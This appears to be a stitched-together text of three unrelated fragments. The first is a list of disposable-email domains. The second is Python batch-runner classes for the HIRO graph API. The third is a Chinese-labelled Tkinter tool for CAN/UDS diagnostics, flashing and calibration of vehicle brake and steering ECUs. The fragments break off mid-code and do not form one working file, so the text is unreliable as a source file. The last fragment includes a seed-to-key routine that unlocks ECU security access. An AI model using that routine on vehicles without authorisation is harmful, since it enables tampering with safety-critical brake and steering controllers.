"wd0payo12t8o1dqp.ga", "wd0payo12t8o1dqp.gq", "wd0payo12t8o1dqp.ml", "wd0payo12t8o1dqp.tk", "wdsfbghfg77hj.gq", "we.lovebitco.in", "we.qq.my", "wealthymoney.pw", "weammo.xyz", 
"weave.email", "web-contact.info", "web-email.eu", "web-emailbox.eu", "web-experts.net", "web-ideal.fr", "web-mail.pp.ua", "web-novosti.ru", "web.discard-email.cf", "web2mailco.com", "webaward.online", "webcontact-france.eu", "webcool.club", "webcoworking.ru", "webemail.me", "webgmail.info", "webhostingdomain.ga", "webide.ga", "webkiff.info", "weblenders.ru", "webm4il.info", "webmail.defaultdomain.ml", "webmail.kolmpuu.net", "webmail24.top", "webmails.top", "webmeetme.com", "webpozdravka.ru", "webpro24.ru", "webtempmail.online", "webtrip.ch", "webuser.in", "webxphp.ru", "wedooos.cf", "wedooos.ga", "wedooos.gq", "wedooos.ml", "wee.my", "weekendemail.com", "wefjo.grn.cc", "weg-beschlussbuch.de", "weg-werf-email.de", "wegwerf-email-addressen.de", "wegwerf-emails.de", "wegwerfadresse.de", "wegwerfemail.de", "wegwerfemail.info", "wegwerfmail.de", "wegwerfmail.info", "wegwerfmail.net", "wegwerfmail.org", "wegwerpmailadres.nl", "weldir.cf", "wellhungup.dynu.net", "wellys37.ru", "wemel.site", "wemel.top", "weprof.it", "wer34276869j.ga", "wer34276869j.gq", "wer34276869j.ml", "wer34276869j.tk", "wertxdn253eg.cf", "wertxdn253eg.ga", "wertxdn253eg.gq", "wertxdn253eg.ml", "wertxdn253eg.tk", "werw436526.cf", "werw436526.ga", "werw436526.gq", "werw436526.ml", "werw436526.tk", "wesandrianto241.ml", "wesatikah407.cf", "wesatikah407.ml", "wesazalia927.ga", "wesd.icu", "weselvina200.tk", "weseni427.tk", "wesfajria37.tk", "wesfajriah489.ml", "wesgaluh852.ga", "weshasni356.ml", "weshutahaean910.ga", "wesjuliyanto744.ga", "weskusumawardhani993.ga", "wesmubasyiroh167.ml", "wesmuharia897.ga", "wesnadya714.tk", "wesnurullah701.tk", "wesruslian738.cf", "wessastra497.tk", "wesw881.ml", "weswibowo593.cf", "weswidihastuti191.ml", "wesyuliyansih469.tk", "weszwestyningrum767.cf", "wetacompany.ru", "wetrainbayarea.com", "wetrainbayarea.org", "wfgdfhj.tk", "wfgoldpin.ru", "wfought0o.com", "wfrijgt4ke.cf", "wfrijgt4ke.ga", "wfrijgt4ke.gq", "wfrijgt4ke.ml", "wfrijgt4ke.tk", "wfxegkfrmfvyvzcwjb.cf", "wfxegkfrmfvyvzcwjb.ga", "wfxegkfrmfvyvzcwjb.gq", "wfxegkfrmfvyvzcwjb.ml", "wfxegkfrmfvyvzcwjb.tk", "wg0.com", "wgetcu0qg9kxmr9yi.ga", "wgetcu0qg9kxmr9yi.ml", "wgetcu0qg9kxmr9yi.tk", "wh4f.org", "whaaso.tk", "whatiaas.com", "whatifanalytics.com", "whatpaas.com", "whatsaas.com", "wheelemail.com", "wheels-club.ru", "whisperfocus.com", "whispersum.com", "whitemail.ga", "whiteseoromania.tk", "whj1wwre4ctaj.ml", "whj1wwre4ctaj.tk", "wholecustomdesign.com", "wholesaleelec.tk", "whoox.com", "whopy.com", "whstores.com", "whyspam.me", "wibblesmith.com", "wibu.online", "wicked-game.cf", "wicked-game.ga", "wicked-game.gq", "wicked-game.ml", "wicked-game.tk", "wicked.cricket", "wickmail.net", "widaryanto.info", "widget.gg", "wierie.tk", "wiki.8191.at", "wiki24.ga", "wiki24.ml", "wikidocuslava.ru", "wikilibhub.ru", "wikipedia-inc.cf", "wikipedia-inc.ga", "wikipedia-inc.gq", "wikipedia-inc.ml", "wikipedia-inc.tk", "wikipedia-llc.cf", "wikipedia-llc.ga", "wikipedia-llc.gq", "wikipedia-llc.ml", "wikipedia-llc.tk", "wikisite.co", "wil.kr", "wild-game.ru", "wildbeard.ru", "wilemail.com", "williamcastillo.me", "willloc.com", "willselfdestruct.com", "wimsg.com", "winemaven.info", "winfreegifts.xyz", "winnweb.win", "wirasempana.com", "wirawan.cf", "wirawanakhmadi.cf", "wisfkzmitgxim.cf", "wisfkzmitgxim.ga", "wisfkzmitgxim.gq", "wisfkzmitgxim.ml", "wisfkzmitgxim.tk", "witchermedallion.ru", "with-u.us", "wix.creou.dev", "wix.ptcu.dev", "wiz2.site", "wj7qzenox9.cf", "wj7qzenox9.ga", "wj7qzenox9.gq", "wj7qzenox9.ml", "wj7qzenox9.tk", "wjhndxn.xyz", 
"wkhaiii.cf", "wkhaiii.ga", "wkhaiii.gq", "wkhaiii.ml", "wkhaiii.tk", "wkschemesx.com", "wla9c4em.com", "wmail.cf", "wmail.club", "wmail.tk", "wmbadszand2varyb7.cf", "wmbadszand2varyb7.ga", "wmbadszand2varyb7.gq", "wmbadszand2varyb7.ml", "wmbadszand2varyb7.tk", "wmlorgana.com", "wmrmail.com", "wmwha0sgkg4.ga", "wmwha0sgkg4.ml", "wmwha0sgkg4.tk", "wmzgjewtfudm.cf", "wmzgjewtfudm.ga", "wmzgjewtfudm.gq", "wmzgjewtfudm.ml", "wmzgjewtfudm.tk", "wn3wq9irtag62.cf", "wn3wq9irtag62.ga", "wn3wq9irtag62.gq", "wn3wq9irtag62.ml", "wn3wq9irtag62.tk", "wn8c38i.com", "wo295ttsarx6uqbo.cf", "wo295ttsarx6uqbo.ga", "wo295ttsarx6uqbo.gq", "wo295ttsarx6uqbo.ml", "wo295ttsarx6uqbo.tk", "wofsrm6ty26tt.cf", "wofsrm6ty26tt.ga", "wofsrm6ty26tt.gq", "wofsrm6ty26tt.ml", "wofsrm6ty26tt.tk", "wokcy.com", "wollan.info", "wolukieh89gkj.tk", "wolukiyeh88jik.ga", "woman2019.ru", "womenbox.ru", "womenhealthcare.ooo", "wonderfulgifts.ru", "wongndeso.gq", "wonlexofficial.ru", "woodmachinery-group.ru", "woodoostudio.ru", "wopc.cf", "wopizza.ru", "wordme.stream", "work4uber.us", "workdinser.ru", "workfast24.ru", "workflowy.club", "workflowy.cn", "workflowy.top", "workflowy.work", "worklists.ru", "worksmail.cf", "worksmail.ga", "worksmail.gq", "worksmail.ml", "worksmail.tk", "world-champion.ru", "world-travel.online", "worlddonation.org", "worldnewstoday.ru", "worldpetcare.cf", "worldsonlineradios.com", "worldspace.link", "wot-booster.ru", "wow.royalbrandco.tk", "wowgrill.ru", "wowhair.ru", "wowmail.gq", "woxvf3xsid13.cf", "woxvf3xsid13.ga", "woxvf3xsid13.gq", "woxvf3xsid13.ml", "woxvf3xsid13.tk", "wp2romantic.com", "wpbinaq3w7zj5b0.cf", "wpbinaq3w7zj5b0.ga", "wpbinaq3w7zj5b0.ml", "wpbinaq3w7zj5b0.tk", "wpdfs.com", "wpeopwfp099.tk", "wpmail.org", "wpower.info", "wqxhasgkbx88.cf", "wqxhasgkbx88.ga", "wqxhasgkbx88.gq", "wqxhasgkbx88.ml", "wqxhasgkbx88.tk", "wr.moeri.org", "wr9v6at7.com", "wrapplese.ru", "writersefx.com", "wrlnewstops.space", "wronghead.com", "wrysutgst57.ga", "wsb-delta.ru", "wsbclusterdelta.ru", "wsbdelta.ru", "wscu73sazlccqsir.cf", "wscu73sazlccqsir.ga", "wscu73sazlccqsir.gq", "wscu73sazlccqsir.ml", "wscu73sazlccqsir.tk", "wsen1.ru", "wsh72eonlzb5swa22.cf", "wsh72eonlzb5swa22.ga", "wsh72eonlzb5swa22.gq", "wsh72eonlzb5swa22.ml", "wsh72eonlzb5swa22.tk", "wt0vkmg1ppm.cf", "wt0vkmg1ppm.ga", "wt0vkmg1ppm.gq", "wt0vkmg1ppm.ml", "wt0vkmg1ppm.tk", "wt2.orangotango.cf", "wtdmugimlyfgto13b.cf", "wtdmugimlyfgto13b.ga", "wtdmugimlyfgto13b.gq", "wtdmugimlyfgto13b.ml", "wtdmugimlyfgto13b.tk", "wteoq7vewcy5rl.cf", "wteoq7vewcy5rl.ga", "wteoq7vewcy5rl.gq", "wteoq7vewcy5rl.ml", "wteoq7vewcy5rl.tk", "wtfdesign.ru", "wu138.club", "wu138.top", "wu158.club", "wu158.top", "wu189.top", "wu8vx48hyxst.cf", "wu8vx48hyxst.ga", "wu8vx48hyxst.gq", "wu8vx48hyxst.ml", "wu8vx48hyxst.tk", "wudet.men", "wuespdj.xyz", "wuyc41hgrf.cf", "wuyc41hgrf.ga", "wuyc41hgrf.gq", "wuyc41hgrf.ml", "wuyc41hgrf.tk", "wuzup.net", "wuzupmail.net", "wvl238skmf.com", "wvppz7myufwmmgh.cf", "wvppz7myufwmmgh.ga", "wvppz7myufwmmgh.gq", "wvppz7myufwmmgh.ml", "wvppz7myufwmmgh.tk", "wvpzbsx0bli.cf", "wvpzbsx0bli.ga", "wvpzbsx0bli.gq", "wvpzbsx0bli.ml", "wvpzbsx0bli.tk", "wvrdwomer3arxsc4n.cf", "wvrdwomer3arxsc4n.ga", "wvrdwomer3arxsc4n.gq", "wvrdwomer3arxsc4n.tk", "wwatme7tpmkn4.cf", "wwatme7tpmkn4.ga", "wwatme7tpmkn4.gq", "wwatme7tpmkn4.tk", "wwjltnotun30qfczaae.cf", "wwjltnotun30qfczaae.ga", "wwjltnotun30qfczaae.gq", "wwjltnotun30qfczaae.ml", "wwjltnotun30qfczaae.tk", "wwpshop.com", "www.barryogorman.com", "www.bccto.me", "www.dmtc.edu.pl", "www.gishpuppy.com", 
"wwweb.cf", "wwweb.ga", "wwwmail.gq", "wwwnew.eu", "wyvernia.net", "wzxmtb3stvuavbx9hfu.cf", "wzxmtb3stvuavbx9hfu.ga", "wzxmtb3stvuavbx9hfu.gq", "wzxmtb3stvuavbx9hfu.ml", "wzxmtb3stvuavbx9hfu.tk", "x-izvestiya.ru", "x-mail.cf", "x-mule.cf", "x-mule.ga", "x-mule.gq", "x-mule.ml", "x-mule.tk", "x-new-ru-news.ru", "x-rugazeta.ru", "x-runovosti.ru", "x-rutochka.ru", "x-vestnik.ru", "x.nadazero.net", "x.tonno.cf", "x.tonno.gq", "x.tonno.ml", "x.tonno.tk", "x0zj6k8.com", "x13x13x13.com", "x1bkskmuf4.cf", "x1bkskmuf4.ga", "x1bkskmuf4.gq", "x1bkskmuf4.ml", "x1bkskmuf4.tk", "x1cult.ru", "x1econ.ru", "x1news.ru", "x1sci.ru", "x1x22716.com", "x24.com", "x2ewzd983ene0ijo8.cf", "x2ewzd983ene0ijo8.ga", "x2ewzd983ene0ijo8.gq", "x2ewzd983ene0ijo8.ml", "x2ewzd983ene0ijo8.tk", "x2fsqundvczas.cf", "x2fsqundvczas.ga", "x2fsqundvczas.gq", "x2fsqundvczas.ml", "x2fsqundvczas.tk", "x2news.ru", "x2science.ru", "x3gsbkpu7wnqg.cf", "x3gsbkpu7wnqg.ga", "x3gsbkpu7wnqg.gq", "x3gsbkpu7wnqg.ml", "x4y.club", "x5a9m8ugq.com", "x5bj6zb5fsvbmqa.ga", "x5bj6zb5fsvbmqa.ml", "x5bj6zb5fsvbmqa.tk", "x7tzhbikutpaulpb9.cf", "x7tzhbikutpaulpb9.ga", "x7tzhbikutpaulpb9.gq", "x7tzhbikutpaulpb9.ml", "x8h8x941l.com", "x8vplxtmrbegkoyms.cf", "x8vplxtmrbegkoyms.ga", "x8vplxtmrbegkoyms.gq", "x8vplxtmrbegkoyms.ml", "x8vplxtmrbegkoyms.tk", "x9dofwvspm9ll.cf", "x9dofwvspm9ll.ga", "x9dofwvspm9ll.gq", "x9dofwvspm9ll.ml", "x9dofwvspm9ll.tk", "xa9f9hbrttiof1ftean.cf", "xa9f9hbrttiof1ftean.ga", "xa9f9hbrttiof1ftean.gq", "xa9f9hbrttiof1ftean.ml", "xa9f9hbrttiof1ftean.tk", "xagloo.com", "xas04oo56df2scl.cf", "xas04oo56df2scl.ga", "xas04oo56df2scl.gq", "xas04oo56df2scl.ml", "xas04oo56df2scl.tk", "xaxx.ml", "xbaby69.top", "xbm7bx391sm5owt6xe.cf", "xbm7bx391sm5owt6xe.ga", "xbm7bx391sm5owt6xe.gq", "xbm7bx391sm5owt6xe.ml", "xbm7bx391sm5owt6xe.tk", "xbmyv8qyga0j9.cf", "xbmyv8qyga0j9.ga", "xbmyv8qyga0j9.gq", "xbmyv8qyga0j9.ml", "xbmyv8qyga0j9.tk", "xbvrfy45g.ga", "xbziv2krqg7h6.cf", "xbziv2krqg7h6.ga", "xbziv2krqg7h6.gq", "xbziv2krqg7h6.ml", "xbziv2krqg7h6.tk", "xc05fypuj.com", "xc40.cf", "xc40.ga", "xc40.gq", "xc40.ml", "xc40.tk", "xc60.cf",
not found or empty in attributes and cannot be determined by any \"{}\"".format(id_key, xid_key)) return ogit_id @staticmethod def get_and_check(attributes: dict, key: str, name: str = 'attributes') -> Any: """ Raise ValueError when key is not in attributes or the value behind the key is empty. :param attributes: Dict of attributes. :param key: The key to look for in *attributes*. :param name: Name of the attributes dict. Default is 'attributes'. :return: the value in *attributes* of the key. :raises ValueError: When 'key' does not exist in *attributes*. """ attribute = attributes.get(key) if not attribute: raise SourceValueError("\"{}\" not found or empty in \"{}\".".format(key, name)) return attribute @staticmethod def for_each_attribute(attributes: dict, *funcs) -> dict: """ Iterate over *attributes* and apply a list of functions to each item. Skips any attribute whose key is empty or starts with '_'. Returns a dict with the results after the *funcs* have been applied, leaving the original *attributes* unchanged. :param attributes: Dict of attributes. :param funcs: Set of functions to apply to each element of *attributes*. :return: The resulting copy of *attributes* """ result = {} for key, value in attributes.items(): if not key or key[0] == '_': continue for func in funcs: key, value = func(key, value) if key is None: break if key is not None: result[key] = value return result def resolve_ids(self, key: str, value: str) -> Tuple[str, str]: """ To be used with self.for_each_attribute() Try to resolve_ids keys that start with "id:" or "xid:". Try to find the ogit/_id of a vertex by using the value for such a key in the graph. Return a tuple of (key, value) with the key without its prefix "id:" or "xid:" and the value resolved to a real "ogit/_id". :param key: Attribute key :param value: Attribute value :return: The changed tuple (key, value). """ if key.startswith("xid:"): ogit_id = self.get_id_by_xid(value) if ogit_id is None or not ogit_id: raise ValueError( "Cannot resolve xid \"{}\" of \"{}\".".format(value, key)) return key[4:], ogit_id elif key.startswith("id:"): ogit_id = self.check_id(value) if ogit_id is None or not ogit_id: raise ValueError( "Cannot find id \"{}\" of \"{}\".".format(value, key)) return key[3:], ogit_id else: return key, value @staticmethod def sanitize_for_update(key: str, value: str) -> Tuple[Optional[str], Optional[str]]: """ To be used with self.for_each_attribute() Return (None, None) when key starts with "ogit/_" unless "ogit/_owner", "ogit/_content" or "ogit/_tags". :param key: Attribute key :param value: Attribute value :return: The changed tuple (key, value) or (None, None) when this item should be skipped. """ if key.startswith("ogit/_") and key not in ["ogit/_owner", "ogit/_content", "ogit/_tags"]: return None, None return key, value @staticmethod def success_message(entity: Entity, action: Action, order: int, data: dict) -> dict: """ Success message format :: { "status": "success", "entity": entity.value, "action": action.value, "order": order, "data": data } :param entity: Entity handled :param action: Action done :param data: JSON to return :param order: Running number of commands. 
:return: The message """ return { "status": Result.SUCCESS.value, "entity": entity.value, "action": action.value, "order": order, "data": data } @staticmethod def error_message(entity: Entity, action: Action, order: int, error: Exception, original: Optional[dict], status_code: int = None, interrupted: bool = None) -> dict: """ Failure message format :: { "status": "fail", "entity": entity.value, "action": action.value, "order": order, "data": { "error": error.__class__.__name__, "message": str(error), "original_data": original } } :param entity: Entity handled :param action: Action done :param order: Running number of commands. :param error: The exception raised :param original: The data that lead to the exception :param status_code: HTTP status code if available :param interrupted: Indicates, that the current batch processing has been interrupted. :return: The message """ message = str(error) if interrupted: message = "BATCH PROCESSING ABORTED! " + message + \ " All further data has been ignored after this error occurred." return { "status": Result.FAILURE.value, "entity": entity.value, "action": action.value, "order": order, "data": { "error": error.__class__.__name__, "code": status_code, "message": message, "original_data": original } } def run(self, attributes: dict, order: int, result_queue: queue.Queue) -> None: """ Run the Command with all data given by *attributes*. This is the enclosing code for all batch runners. The implementation of a handling a single entry of the *attributes* is defined in derived ...Runner-classes. :param attributes: Dict with attributes to handle in HIRO. :param order: Number of the command read from the *self._request_queue*. :param result_queue: Queue receiving the results. """ try: response: dict = self.run_item(attributes) response_code = 200 message = self.success_message(self.entity, self.action, order, response) except RequestException as error: response_code = error.response.status_code if error.response is not None else 999 message = self.error_message(self.entity, self.action, order, error, attributes, response_code) except SourceValueError as error: response_code = 400 message = self.error_message(self.entity, self.action, order, error, attributes, 400) except Exception as error: response_code = 500 message = self.error_message(self.entity, self.action, order, error, attributes, 500) result_queue.put((message, response_code, order)) @abstractmethod def run_item(self, attributes: dict) -> dict: """ Abstract method overwritten by derived runner classes. :param attributes: A dict of attributes to handle. :return: A response dict - usually directly the structure received from the backend. """ raise RuntimeError("Cannot call abstract method 'run_item()' within HiroCommandBatch directly.") class CreateVerticesRunner(HiroBatchRunner): """ Create vertices """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Create vertices :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.VERTEX, Action.CREATE, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to create a vertex from. :return: A response dict - usually directly the structure received from the backend. 
""" ogit_type = self.get_and_check(attributes, "ogit/_type") final_attributes = self.for_each_attribute(attributes, self.resolve_ids) response: dict = self.connection.create_node(final_attributes, ogit_type) self.session_data.register_response(attributes, response) return response class UpdateVerticesRunner(HiroBatchRunner): """ Update vertices """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Update vertices :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.VERTEX, Action.UPDATE, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to update a vertex from. :return: A response dict - usually directly the structure received from the backend. """ ogit_id = self.get_and_check_vertex_id(attributes) final_attributes = self.for_each_attribute(attributes, self.resolve_ids, self.sanitize_for_update) response: dict = self.connection.update_node(ogit_id, final_attributes) self.session_data.register_response(attributes, response) return response class DeleteVerticesRunner(HiroBatchRunner): """ Delete vertices """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Delete vertices :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.VERTEX, Action.DELETE, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to delete a vertex from. :return: A response dict - usually directly the structure received from the backend. """ ogit_id = self.get_and_check_vertex_id(attributes) response: dict = self.connection.delete_node(ogit_id) self.session_data.unregister_by_response(response) return response class HandleVerticesRunner(HiroBatchRunner): """ Handle vertices. Either update or create them based on incoming payload entries. """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Handle vertices. Either update or create them based on incoming payload entries. :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.VERTEX, Action.UNDEFINED, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to handle a vertex from. Updates the vertex when it can be found via ogit/_id or ogit/_xid, creates the vertex otherwise when ogit/_type is present. :return: A response dict - usually directly the structure received from the backend. 
""" self.action = Action.UNDEFINED ogit_id = self.get_vertex_id(attributes) self.action = Action.UPDATE if ogit_id else Action.CREATE if self.action == Action.CREATE: ogit_type = self.get_and_check(attributes, "ogit/_type") final_attributes = self.for_each_attribute(attributes, self.resolve_ids) response: dict = self.connection.create_node(final_attributes, ogit_type) else: final_attributes = self.for_each_attribute(attributes, self.resolve_ids, self.sanitize_for_update) response: dict = self.connection.update_node(ogit_id, final_attributes) self.session_data.register_response(attributes, response) return response class CreateEdgesRunner(HiroBatchRunner): """ Create edges between vertices """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Create edges between vertices :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.EDGE, Action.CREATE, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to create edges from. :return: A response dict -
self.strvReleaseEPB.set("释放电子卡钳") self.btnReleaseEPB = ttk.Button(self.frameesc, textvariable=self.strvReleaseEPB, command=self.BtnReleaseEPB_Click) self.btnReleaseEPB.grid(row=2, column=0, padx=3, pady=3) self.btnReleaseEPB["state"] = tk.DISABLED self.strvApplyEPB = tk.StringVar() self.strvApplyEPB.set("夹紧电子卡钳") self.btnApplyEPB = ttk.Button(self.frameesc, textvariable=self.strvApplyEPB, command=self.BtnApplyEPB_Click) self.btnApplyEPB.grid(row=2, column=1, padx=3, pady=3) self.btnApplyEPB["state"] = tk.DISABLED self.swpath4show = tk.StringVar() tk.Label(self.frameesc, text = "ESC软件路径:").grid(row = 8, column = 0) tk.Entry(self.frameesc, textvariable = self.swpath4show).grid(row = 8, column = 1) self.btnFilePath = ttk.Button(self.frameesc, text = "sw路径选择", command = self.BtnSelectSwPath_Click) self.btnFilePath.grid(row = 8, column = 2, padx=5, pady=5) self.bootpath4show = tk.StringVar() tk.Label(self.frameesc, text = "boot软件路径:").grid(row = 9, column = 0) tk.Entry(self.frameesc, textvariable = self.bootpath4show).grid(row = 9, column = 1) self.btnFilePath = ttk.Button(self.frameesc, text = "boot路径选择", command = self.BtnSelectBootPath_Click) self.btnFilePath.grid(row = 9, column = 2, padx=5, pady=5) self.btnSwFlash = ttk.Button(self.frameesc, text = "开始刷写", command = self.BtnSwFlash_Click) self.btnSwFlash.grid(row = 10, column = 0, columnspan=2, padx=10, pady=10) self.btnSwFlash["state"] = tk.DISABLED self.strvResetECU = tk.StringVar() self.strvResetECU.set("重启ECU") self.btnResetECU = ttk.Button(self.frameesc, textvariable=self.strvResetECU, command=self.BtnResetECU_Click) self.btnResetECU.grid(row=7, column=0, padx=3, pady=3) self.btnResetECU["state"] = tk.DISABLED #EPS part####################################################################### self.strvCaliEPS2wd = tk.StringVar() self.strvCaliEPS2wd.set("C11两驱SAS中位标定") self.btnCaliEPS2wd = ttk.Button(self.frameeps, textvariable=self.strvCaliEPS2wd, command=self.BtnCaliEPS2wd_Click) self.btnCaliEPS2wd.grid(row=0, column=0, padx=3, pady=3) self.btnCaliEPS2wd["state"] = tk.DISABLED self.strvCaliEPS4wd = tk.StringVar() self.strvCaliEPS4wd.set("C11四驱SAS中位标定") self.btnCaliEPS4wd = ttk.Button(self.frameeps, textvariable=self.strvCaliEPS4wd, command=self.BtnCaliEPS4wd_Click) self.btnCaliEPS4wd.grid(row=1, column=0, padx=3, pady=3) self.btnCaliEPS4wd["state"] = tk.DISABLED self.strvDeCaliEPS4wd = tk.StringVar() self.strvDeCaliEPS4wd.set("C11四驱SAS中位解标") self.btnDeCaliEPS4wd = ttk.Button(self.frameeps, textvariable=self.strvDeCaliEPS4wd, command=self.BtnDeCaliEPS4wd_Click) self.btnDeCaliEPS4wd.grid(row=1, column=1, padx=3, pady=3) self.btnDeCaliEPS4wd["state"] = tk.DISABLED #diag test part################################################################ self._v = IntVar() self.Radioesc = Radiobutton(self.frametest,text='ESC',variable=self._v,value=1) #TODO. 
need to add function for switching addressing self.Radioesc.grid(row=0, column=0, padx=3, pady=3) self.Radioeps = Radiobutton(self.frametest,text='EPS',variable=self._v,value=2) self.Radioeps.grid(row=0, column=1, padx=3, pady=3) self.Radioepb = Radiobutton(self.frametest,text='EPB',variable=self._v,value=3) self.Radioepb.grid(row=0, column=2, padx=3, pady=3) self.testlog = tk.Text(self.frametest, width=70, height=30) self.testlog.grid(row=2, column=0, rowspan=10, columnspan=10) self.btnAutoDiagTest = ttk.Button(self.frametest, text="开始测试", command=self.BtnAutoDiagTest_Click) self.btnAutoDiagTest.grid(row=13, column=0, padx=3, pady=3) self.btnAutoDiagTest["state"] = tk.DISABLED self.btnExportReport = ttk.Button(self.frametest, text="输出测试报告", command=self.BtnExportReport_Click) self.btnExportReport.grid(row=13, column=1, padx=3, pady=3) self.btnExportReport["state"] = tk.DISABLED self.btnClrReport = ttk.Button(self.frametest, text="清空屏幕", command=self.BtnClrReport_Click) self.btnClrReport.grid(row=13, column=2, padx=3, pady=3) self.btnClrReport["state"] = tk.DISABLED ############################################################################### ### Function ############################################################################### def ChnInfoUpdate(self, is_open): #通道信息获取 cur_dev_info = self._dev_info[self.cmbDevType.get()] cur_chn_info = cur_dev_info["chn_info"] if is_open: # 通道 self.cmbCANChn["value"] = tuple([i for i in range(cur_dev_info["chn_num"])]) self.cmbCANChn.current(0) # 工作模式 self.cmbCANMode["value"] = ("正常模式", "只听模式") self.cmbCANMode.current(0) # 波特率 self.cmbBaudrate["value"] = tuple([brt for brt in cur_chn_info["baudrate"].keys()]) self.cmbBaudrate.current(len(self.cmbBaudrate["value"]) - 3) if cur_chn_info["is_canfd"] == True: # 数据域波特率 self.cmbDataBaudrate["value"] = tuple([brt for brt in cur_chn_info["data_baudrate"].keys()]) self.cmbDataBaudrate.current(0) self.cmbDataBaudrate["state"] = "readonly" if cur_chn_info["sf_res"] == True: self.cmbResEnable["value"] = ("使能", "失能") self.cmbResEnable.current(0) self.cmbResEnable["state"] = "readonly" # 是否启用UDS协议 self.cmbUDSEnable["value"] = ("是", "否") self.cmbUDSEnable.current(0) self.cmbUDSEnable["state"] = "readonly" self.btnCANCtrl["state"] = tk.NORMAL else: self.cmbCANChn["state"] = tk.DISABLED self.cmbCANMode["state"] = tk.DISABLED self.cmbBaudrate["state"] = tk.DISABLED self.cmbDataBaudrate["state"] = tk.DISABLED self.cmbResEnable["state"] = tk.DISABLED self.cmbUDSEnable["state"] = tk.DISABLED self.cmbCANChn["value"] = () self.cmbCANMode["value"] = () self.cmbBaudrate["value"] = () self.cmbDataBaudrate["value"] = () self.cmbResEnable["value"] = () self.cmbUDSEnable["value"] = () self.btnCANCtrl["state"] = tk.DISABLED def ChnInfoDisplay(self, enable): if enable: self.cmbCANChn["state"] = "readonly" self.cmbCANMode["state"] = "readonly" self.cmbBaudrate["state"] = "readonly" if self._is_canfd: self.cmbDataBaudrate["state"] = "readonly" if self._res_support: self.cmbResEnable["state"] = "readonly" self.cmbUDSEnable["state"] = "readonly" else: self.cmbCANChn["state"] = tk.DISABLED self.cmbCANMode["state"] = tk.DISABLED self.cmbBaudrate["state"] = tk.DISABLED self.cmbDataBaudrate["state"] = tk.DISABLED self.cmbResEnable["state"] = tk.DISABLED self.cmbUDSEnable["state"] = tk.DISABLED def DevInfoRead(self): info = self._zcan.GetDeviceInf(self._dev_handle) if info != None: self.strvHwVer.set(info.hw_version) self.strvFwVer.set(info.fw_version) self.strvDrVer.set(info.dr_version) self.strvInVer.set(info.in_version) 
self.strvCANNum.set(str(info.can_num)) self.strvSerial.set(info.serial) self.strvHwType.set(info.hw_type) def DevInfoClear(self): self.strvHwVer.set('') self.strvFwVer.set('') self.strvDrVer.set('') self.strvInVer.set('') self.strvCANNum.set('') self.strvSerial.set('') self.strvHwType.set('') def MsgBox4Dtc(self, dtcs): self.DTCBox = tk.Toplevel() self.DTCBox.geometry('320x400') self.DTCBox.title('故障列表') if dtcs is not None: for i in range(min(len(dtcs),16)): tk.Label(self.DTCBox, anchor= tk.W, text=i).grid(row=i, column=0,sticky=tk.W) tk.Label(self.DTCBox, anchor=tk.W, text=hex(dtcs[i].id)).grid(row=i, column=1,sticky=tk.W) if hex(dtcs[i].id) in self._DTCList.keys(): tk.Label(self.DTCBox, anchor=tk.W, text=self._DTCList[hex(dtcs[i].id)]).grid(row=i, column=2,sticky=tk.W) else: tk.Label(self.DTCBox, anchor=tk.W, text="unknow DTC").grid(row=i, column=2,sticky=tk.W) #Clear DTC self.btnClrDTC = ttk.Button(self.DTCBox, textvariable=self.strvClrDTC, command=self.BtnClearDTC_Click) self.btnClrDTC.grid(row= min(len(dtcs),16)+1, column=0, columnspan=3, pady=2) else: tk.Label(self.DTCBox, anchor= tk.N, text="无故障! :)") self.btnReadDTC["state"] = tk.DISABLED #disable reading DTC to avoid multi DTC windows self.DTCBox.protocol('WM_DELETE_WINDOW', self.CloseDTCBox) #enable reading DTC again def CloseDTCBox(self): self.btnReadDTC["state"] = tk.NORMAL self.DTCBox.destroy() def SecAlgo(self, level, seed, params): """ Builds the security key to unlock a security level. temp_key = bytearray(seed) self.output_key = bytearray(seed) xorkey = bytearray(params['xorkey']) for i in range(len(temp_key)): temp_key[i] = temp_key[i] ^ xorkey[i] self.output_key[0] = (temp_key[3] & 0x0F) | (temp_key[2] & 0xF0) self.output_key[1] = ((temp_key[2] & 0x1F) << 3) | ((temp_key[1] & 0xF8) >> 3) self.output_key[2] = ((temp_key[1] & 0xFC) >> 2) | (temp_key[0] & 0xC0) self.output_key[3] = ((temp_key[0] & 0x0F) << 4) | (temp_key[3] & 0x0F) """ temp_key = (seed[0]<<24) | (seed[1] << 16) | (seed[2] << 8) | (seed[3]) if level == 0x01: output_key_temp = ((((temp_key >> 4) ^ temp_key) << 3) ^ temp_key) & 0xFFFFFFFF elif level == 0x11: _temp_y = ((temp_key<<24) & 0xFF000000) + ((temp_key<<8) & 0xFF0000) + ((temp_key>>8) & 0xFF00) + ((temp_key>>24) & 0xFF) _temp_z = 0 _temp_sum = 0 for i in range(64): _temp_y += ((((_temp_z<<4) ^ (_temp_z>>5)) + _temp_z) ^ (_temp_sum + params[_temp_sum&0x3])) & 0xFFFFFFFF _temp_y = _temp_y & 0xFFFFFFFF _temp_sum += 0x8F750A1D _temp_sum = _temp_sum & 0xFFFFFFFF _temp_z += ((((_temp_y<<4) ^ (_temp_y>>5)) + _temp_y) ^ (_temp_sum + params[(_temp_sum>>11)&0x3])) & 0xFFFFFFFF _temp_z = _temp_z & 0xFFFFFFFF output_key_temp = (((_temp_z<<24) & 0xFF000000) | ((_temp_z<<8) & 0xFF0000) | ((_temp_z>>8) & 0xFF00) | ((_temp_z>>24) & 0xFF)) else: output_key_temp = temp_key output_key = 